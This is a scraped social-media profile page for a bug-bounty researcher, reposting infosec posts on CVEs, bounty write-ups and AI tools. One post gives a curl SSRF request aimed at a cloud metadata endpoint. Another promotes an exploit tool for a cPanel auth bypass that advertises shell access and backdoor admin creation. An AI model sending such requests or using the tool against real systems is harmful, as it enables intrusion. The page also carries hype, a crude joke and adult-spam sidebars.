Olivia
Online
Dilawer
@DilawerSec
Independent Security Researcher
Pakistan
Joined July 2014
678 Following
316 Followers
1.4K Posts
Pre-built Jailbroken iOS 26 iPhone fully Run on VM
Full virtual iPhone ready-to-run jailbroken iPhone (rootless + Sileo + Filza + TrollStore vibes).
(iOS 26.1 PCC-based) already jailbroken + bootstrapped + few popular tweaks pre-installed.
No more painful QEMU/VZ setup from scratch.
Just download, follow 3 4 steps and you’re inside a real iOS environment on your Mac.
Test tweaks, exploit PoCs, debug without touching your daily driver.
16 GB+ RAM recommended
- https://t.co/MDqHtNVlWw
Hacking Google with A.I. for $500,000
https://t.co/S8NbDU9ZaN
https://t.co/K8gZsopzNg
Yesterday, we announced new product capabilities, and some of our messaging created confusion. We want to be direct.
Researcher submissions are not used to train, fine-tune, or otherwise improve generative AI models. This applies across our platform, including H1 Continuous Testing, H1 Agentic PTaaS, and Hai. Third-party model providers we work with are also prohibited from retaining or using researcher data for their own training.
We've updated our website language to reflect this more clearly. We heard your concerns, and we take them seriously.
Found a cool bug at Meta.
From misconfigured Grafana instance to R/W access on 507 private Meta repositories.
Wrote up the full chain here:
https://t.co/LYQ0prc68d
$157k bounty awarded by @metabugbounty
@thedawgyg Read there comments everyone is saying its rape😂
Last week's Next.js stable release patches multiple vulnerabilities found by @HacktronAI
CVE-2026-44578: SSRF via WebSocket upgrade.
It is the most impactful of all, it lets an attacker read internal hosts such as cloud metadata endpoints on self-hosted next.js applications.
curl -H "Connection: Upgrade" -H "Upgrade: websocket" \
-H "Sec-WebSocket-Version: 13" \
-H "Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==" \
"http://target:3000" \
--request-target "http://169.254.169.254/latest/meta-data/"
$14,337 Google Bug Bounty 🤑
Hacking Google Support: Leaking millions of customer records by Michael Dalton 🤯🔥
👨💻 Michael Dalton (https://t.co/fmpfi56Mdf)
🔗 https://t.co/zwLEQPXQV5
https://t.co/ybPysEvzt9
🚨 cPanelSniper — CVE-2026-41940
cPanel & WHM'de CVSS 10.0 kritik auth bypass.
CRLF injection → session file poisoning → root WHM access.
Zero creds. ~70M domain affected.
4-stage chain:
→ preauth session mint
→ CRLF inject via Authorization header
→ do_token_denied gadget (raw→cache flush)
→ /json-api/version → PWNED
✅ Interactive WHM shell
✅ Account enum · cmd exec · backdoor admin
✅ Bulk scan · pipeline ready · stdlib only
🔗 https://t.co/gmRA0xtEsx
#BugBounty #InfoSec #WHM #RedTeam #AppSec #bugbountytip #bugbountytips #infosec #recon
The Internet is falling down, falling down, falling down
Welcome back to another disaster - this time, an Auth Bypass in cPanel/WHM, tracked as CVE-2026-41940
Enjoy with us..
https://t.co/bOzCPy8iS1
Andrej Karpathy could have charged $10,000 for this course.
He put it on YouTube.
The man who built Tesla Autopilot from scratch.
Co-founded OpenAI.
Understands AI at a level most engineers at Google and Meta never reach.
Sat down. Recorded 2 hours. No frameworks. No libraries. No shortcuts.
Then dropped it for free.
The gap between people who watch it this week and those who save it for later is not 2 hours.
It is everything those 2 hours quietly unlock for the rest of your career.
🚨 BREAKING
FIRST BTC ADDRESS JUST GOT CRACKED USING QUANTUM COMPUTING!
A HACKER BROKE A 15-BIT ECC KEY USING PUBLICLY AVAILABLE QUANTUM HARDWARE.
MEANWHILE, ~6.9 MILLION BTC ARE SITTING ON ADDRESSES WITH EXPOSED PUBLIC KEYS.
IF 256-BIT ECC FALLS, THESE COULD BE THE FIRST TO GO.
THIS IS EXTREMELY BAD FOR MARKETS!
I reviewed a JS file several times. Found nothing.
Fed it to Claude Desktop (free version). It mapped hidden endpoints in seconds.
That led me to:
• PII of high-profile users
• Fund redirection to any bank account
• Balance manipulation
Check it ↓
https://t.co/8NL3Zd3IzH
I vibe coded a tool that fetches your 𝗛𝗮𝗰𝗸𝗲𝗿𝗢𝗻𝗲 programs' 𝗔𝗻𝗱𝗿𝗼𝗶𝗱 scope, downloads the APKs via 𝗮𝗽𝗸𝗲𝗲𝗽, and decompiles them with 𝗷𝗮𝗱𝘅 — all in one go.
https://t.co/c7mUe365us
#hackerone #bugbountytips #android
Tomcat JMX Proxy exposed without auth?
Wrote a blog about how I got shell on a production Tomcat behind Cloudflare despite the deploy API being locked down, WAF blocking payloads, and CDN filtering template syntax.
8 dead ends. Then AccessLogValve + docBase + relaxedQueryChars + EL injection. 14 requests to RCE.
Tool + nuclei template included!
https://t.co/Ll5IkcnkDa
#bugbountytips #bugbounty
I've been in the bug bounty scene for over a decade now. $2M in bounties later, I figured it was time to sit down and talk about everything I've learned! 👉🏼 https://t.co/08n3TETXvc
Writing shellcode into remote processes via ROP gadgets and existing RWX regions
https://t.co/SFfTtXPW7e
Research by @G3tSyst3m
#infosec
Last Seen Users on Sotwe
Flex Triple-X
Seen from Germany
Dony pemuas TANTE
Seen from Indonesia
raycisya 
Seen from Singapore
Trans อวบอ้วน ลับๆ ด้านมืด
Seen from Thailand
มักสาวใหญ่ สาวแก่แม่หม้าย
Seen from Thailand
Serkan
Seen from Turkey
Apollo Twink | FREE ONLYFANS
Seen from Turkey
Karim Karimo
Seen from Egypt
Denizli sex ve olgun kadın hastası
Seen from Turkey
みづは🌸(みーちゃん)💗今日も元気生成中
Seen from Japan
Most Popular Users
Elon Musk
@elonmusk
240.6M followers
Barack Obama
@barackobama
119.2M followers
Donald J. Trump
@realdonaldtrump
111.7M followers
Cristiano Ronaldo
@cristiano
110.5M followers
Narendra Modi
@narendramodi
107M followers
Rihanna
@rihanna
97.6M followers
NASA
@nasa
92.2M followers
Justin Bieber
@justinbieber
90.9M followers
KATY PERRY
@katyperry
87.6M followers
Taylor Swift
@taylorswift13
81.4M followers
Lady Gaga
@ladygaga
73M followers
Virat Kohli
@imvkohli
69.8M followers
Kim Kardashian
@kimkardashian
69.8M followers
YouTube
@youtube
68.7M followers
Bill Gates
@billgates
63.9M followers
Neymar Jr
@neymarjr
62.5M followers
The Ellen Show
@theellenshow
62.4M followers
CNN
@cnn
61.9M followers
X
@x
60.8M followers
Selena Gomez
@selenagomez
60.7M followers